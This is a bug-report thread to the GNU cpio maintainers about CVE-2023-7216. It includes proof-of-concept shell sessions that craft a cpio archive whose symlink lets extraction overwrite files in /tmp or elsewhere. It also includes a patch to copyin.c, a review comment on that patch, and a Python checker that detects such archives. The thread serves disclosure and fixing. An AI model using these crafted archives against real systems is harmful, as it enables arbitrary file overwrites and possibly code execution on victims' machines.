From: Nick Tait (he / him)
Subject: Re: Is there a fix for this CVE-2023-7216?
Date: Thu, 29 Feb 2024 16:05:20 -0700
Dear cpio maintainer:
This is a Red Hat Community Report on CVE-2023-7216: https://bugzilla.redhat.com/show_bug.cgi?id=2249901
CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories.
Red Hat's PoC for CVE-2023-7216 can be reproduced using the following method:
```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat tmp/trav.txt
TEST Traversal
```
Based on my understanding of the PoC and analysis of CVE-2023-7216, I constructed two more PoC scenarios.
POC1 can be reproduced using the following method:
Machine A can use the tampered trav.cpio file to overwrite any file on machine B, which may lead to remote command execution.
Machine A:
```
[root@localhostA home]# mkdir testcpio
[root@localhostA home]# ln -sf /tmp/ testcpio/tmp
[root@localhostA home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhostA home]# cd testcpio/
[root@localhostA testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
```
Assume that machine A transfers files to machine B through scp or other file transfer methods. CVE-2023-7216 is triggered when machine B opens trav.cpio.
Machine B:
```
[root@localhostB home]# cpio -i < trav.cpio
[root@localhostB home]# cat /tmp/trav.txt
TEST Traversal
[root@localhostB home]# cat tmp/trav.txt
TEST Traversal
```
Impact of POC1: This indicates that any cpio archive file that contains symlinks may cause security risks such as path traversal.
POC2 can be reproduced using the following method:
```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# mkdir dirA
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio -D /home/dirA
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat dirA/tmp/trav.txt
TEST Traversal
```
Impact of POC2: When the -D option is used, the cpio file is expected to be decompressed in the specified directory. However, due to the impact of CVE-2023-7216, the file is also generated in the symlink directory, which is not as expected, like CVE-2015-1197. When the --no-absolute-filenames option is used, the decompressed file should be generated in the current directory instead of the symlink directory.
First of all, I would like to discuss an issue with you: when fixing CVE-2015-1197, the copyin_link () function generates symlinks directly through the symlink () function if the --no-absolute-filenames option is not used when processing symlinks. This means that in this case, cpio allows writing files in arbitrary directories through symlinks. Is this what cpio was designed for?
I believe this design is the root cause of CVE-2023-7216. If you think this is a reasonable design, please let me know your reasons and provide a solution for CVE-2023-7216.
If you agree with me that cpio should not allow writing files in arbitrary directories through symlinks, then we can discuss my solution.
In my view, I don't think we can guarantee that the cpio archive does not contain any symlinks. We must handle each symlink in the same way as the fix for CVE-2015-1197 during decompression. So I made a patch, which I have attached to this mail. If you have a better fix, please let me know.
I look forward to your feedback and suggestions soon.
Best Regards,
Peng

From 9cf2f601f9beec06b0e7b4fcf3f454195bff1b77 Mon Sep 17 00:00:00 2001
From: Peng <2773414454@qq.com>
Date: Thu, 29 Feb 2024 17:22:11 +0800
Subject: [PATCH] default use symlink_placeholder() to fix Path Traversal

---
 src/copyin.c | 26 +-------------------------
 1 file changed, 1 insertion(+), 25 deletions(-)

diff --git a/src/copyin.c b/src/copyin.c
index ace0a02..c454313 100644
--- a/src/copyin.c
+++ b/src/copyin.c
@@ -789,31 +789,7 @@ copyin_link (struct cpio_file_stat *file_hdr, int in_file_des)
       link_name = xstrdup (file_hdr->c_tar_linkname);
     }
 
-  if (no_abs_paths_flag)
-    symlink_placeholder (link_name, file_hdr->c_name, file_hdr);
-  else
-    {
-      res = UMASKED_SYMLINK (link_name, file_hdr->c_name,
-                             file_hdr->c_mode);
-      if (res < 0 && create_dir_flag)
-        {
-          create_all_directories (file_hdr->c_name);
-          res = UMASKED_SYMLINK (link_name, file_hdr->c_name, file_hdr->c_mode);
-        }
-      if (res < 0)
-        symlink_error (link_name, file_hdr->c_name);
-      else if (!no_chown_flag)
-        {
-          uid_t uid = set_owner_flag ? set_owner : file_hdr->c_uid;
-          gid_t gid = set_group_flag ? set_group : file_hdr->c_gid;
-          if (lchown (file_hdr->c_name, uid, gid) < 0 && errno != EPERM)
-            chown_error_details (file_hdr->c_name, uid, gid);
-        }
-
-      if (retain_time_flag)
-        set_file_times (-1, file_hdr->c_name, file_hdr->c_mtime,
-                        file_hdr->c_mtime, AT_SYMLINK_NOFOLLOW);
-    }
+  symlink_placeholder (link_name, file_hdr->c_name, file_hdr);
 
   free (link_name);
 }
-- 
2.33.0

------------------ Original ------------------
From: "Peng" <2773414454@qq.com>
Date: Thu, Feb 29, 2024 07:02 PM
To: "bug-cpio" <bug-cpio@gnu.org>; "ntait" <ntait@redhat.com>; "gray" <gray@gnu.org.ua>; "mrehak" <mrehak@redhat.com>
Subject: Re: Is there a fix for this CVE-2023-7216?

Dear cpio maintainer:
This is a Red Hat Community Report on CVE-2023-7216: https://bugzilla.redhat.com/show_bug.cgi?id=2249901
CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories.
Red Hat's PoC for CVE-2023-7216 can be reproduced using the following method:
```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat tmp/trav.txt
TEST Traversal
```
First of all, I would like to confirm with you: do you accept CVE-2023-7216? Is CVE-2023-7216 a bug, or is it the default behavior of the cpio software?
If CVE-2023-7216 is a bug, I will try to provide a fix patch. Of course, if there is a better fix, please point it out.
CVE-2023-7216 is similar to CVE-2015-1197; both of them use symlinks to cause path traversal.
The CVE-2015-1197 fix uses symlink_placeholder () to fix a path traversal issue in the --no-absolute-filenames scenario.
However, CVE-2023-7216 proves that path traversal also exists in other scenarios.
So I made a patch to fix CVE-2023-7216: copyin_link() should enable symlink_placeholder() by default, not only when the --no-absolute-filenames option is on.
I look forward to your feedback and suggestions soon.
Best Regards,
Peng

------------------ Original ------------------
From: "2773414454" <2773414454@qq.com>
Date: Tue, Feb 20, 2024 11:03 AM
To: "bug-cpio" <bug-cpio@gnu.org>
Subject: Is there a fix for this CVE-2023-7216?
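Review bot: the else-branch removed from copyin_link() did more than call UMASKED_SYMLINK: under create_dir_flag it created missing parent directories, under !no_chown_flag it applied lchown() with the set_owner/set_group overrides, and under retain_time_flag it restored the mtime via set_file_times(..., AT_SYMLINK_NOFOLLOW). Making symlink_placeholder() unconditional drops all of that from this path, so unless the step that later converts placeholders into real symlinks reapplies owner and timestamps, every symlink extracted in the default mode now loses them; please confirm that before merging or carry those steps over. Two smaller points: `res` is no longer assigned anywhere in this hunk, so if it is declared earlier in the function the compiler will warn about an unused variable, and since the default and --no-absolute-filenames paths now behave identically for symlinks, the behaviour change deserves a NEWS/documentation entry.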
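As an added example (not part of this thread or of cpio's own code), the following Python checker parses a small `cpio -H newc` archive and flags, before extraction, the two conditions discussed above: a record whose path passes through a symlink created by an earlier record (the CVE-2023-7216 shape that deferring symlink creation via symlink_placeholder() prevents) and a symlink whose target leaves the extraction directory (the CVE-2015-1197 / --no-absolute-filenames case). It assumes the newc format rather than the binary format the PoC's default `cpio -o` writes, and the sample archives, including one mirroring the PoC's `tmp -> /tmp/` plus `tmp/trav.txt`, are constructed in the code.

```python
import posixpath

NEWC_MAGIC = b"070701"
S_IFMT, S_IFLNK = 0o170000, 0o120000

def newc_entry(name: str, mode: int, data: bytes) -> bytes:
    # One 'cpio -H newc' record: magic, 13 hex fields, NUL-terminated name, then data, each padded to 4 bytes.
    nameb = name.encode() + b"\0"
    fields = [0, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(nameb), 0]
    head = NEWC_MAGIC + b"".join(b"%08X" % f for f in fields) + nameb
    head += b"\0" * (-len(head) % 4)
    return head + data + b"\0" * (-len(data) % 4)

def iter_newc(archive: bytes):
    off = 0
    while off < len(archive):
        assert archive[off:off + 6] == NEWC_MAGIC, f"bad newc magic at offset {off}"
        f = [int(archive[off + 6 + 8 * i:off + 14 + 8 * i], 16) for i in range(13)]
        mode, size, namesize = f[1], f[6], f[11]
        name = archive[off + 110:off + 110 + namesize - 1].decode()
        off = (off + 110 + namesize + 3) & ~3
        data, off = archive[off:off + size], (off + size + 3) & ~3
        if name == "TRAILER!!!":
            return
        yield name, mode, data

def unsafe_entries(archive: bytes):
    # Return (name, reason) for records an extractor must not create in place.
    findings, symlinks = [], set()
    for name, mode, data in iter_newc(archive):
        norm = posixpath.normpath(name)
        if posixpath.isabs(norm) or norm == ".." or norm.startswith("../"):
            findings.append((name, "escapes the extraction directory"))
            continue
        parts = norm.split("/")
        # CVE-2023-7216 shape: a later record's path passes through a symlink created by an earlier one.
        hit = next((p for p in ("/".join(parts[:i]) for i in range(1, len(parts))) if p in symlinks), None)
        if hit:
            findings.append((name, f"path goes through earlier symlink '{hit}'"))
        if (mode & S_IFMT) == S_IFLNK:
            target = data.decode()
            resolved = posixpath.normpath(posixpath.join(posixpath.dirname(norm), target))
            if posixpath.isabs(target) or resolved == ".." or resolved.startswith("../"):
                findings.append((name, f"symlink target '{target}' leaves the extraction directory"))
            symlinks.add(norm)
    return findings

# Constructed archives. TRAV_CPIO mirrors the PoC above: symlink 'tmp' -> /tmp/, then 'tmp/trav.txt'.
TRAV_CPIO = (newc_entry("tmp", S_IFLNK | 0o777, b"/tmp/")
             + newc_entry("tmp/trav.txt", 0o100644, b"TEST Traversal\n") + newc_entry("TRAILER!!!", 0, b""))
SAFE_CPIO = (newc_entry("docs", S_IFLNK | 0o777, b"share/doc")
             + newc_entry("share/doc/README", 0o100644, b"hello\n") + newc_entry("TRAILER!!!", 0, b""))
```

`unsafe_entries(TRAV_CPIO)` reports both the absolute symlink target and the file written through it, while the archive with a relative, in-tree symlink produces no findings.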